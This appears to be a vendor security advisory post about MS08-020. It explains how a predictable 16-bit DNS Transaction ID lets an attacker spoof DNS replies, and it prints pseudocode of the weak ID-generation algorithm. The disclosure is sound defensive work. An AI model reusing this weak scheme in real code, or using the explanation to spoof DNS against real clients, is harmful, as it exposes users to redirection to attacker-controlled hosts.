Today we released MS08-020 to address a weakness in the Transaction ID (TXID) generation algorithm in the DNS client resolver. The TXID is a 16-bit entity that is primarily used as a synchronization mechanism between DNS servers/clients; in fact, you can think of it as an Initial Sequence Number (ISN) for DNS query/response exchanges. Consequently, the TXID is intended to be somewhat random and difficult to predict. If both the TXID and hostname are predictable, an attacker can forge malicious DNS replies which the DNS client resolver will believe to be from the legitimate DNS server. The client would then use the spoofed information to make an outbound connection to a (potentially) attacker-controlled IP.

GlobalSeed++;
SomeNumber = (WORD)GetTickCount()+(SomeRandomAddress>>6)+GlobalSeed;
XID = (SomeNumber%487)+1+GlobalLastTXID)^SomeNumber;
GlobalLastTXID = XID;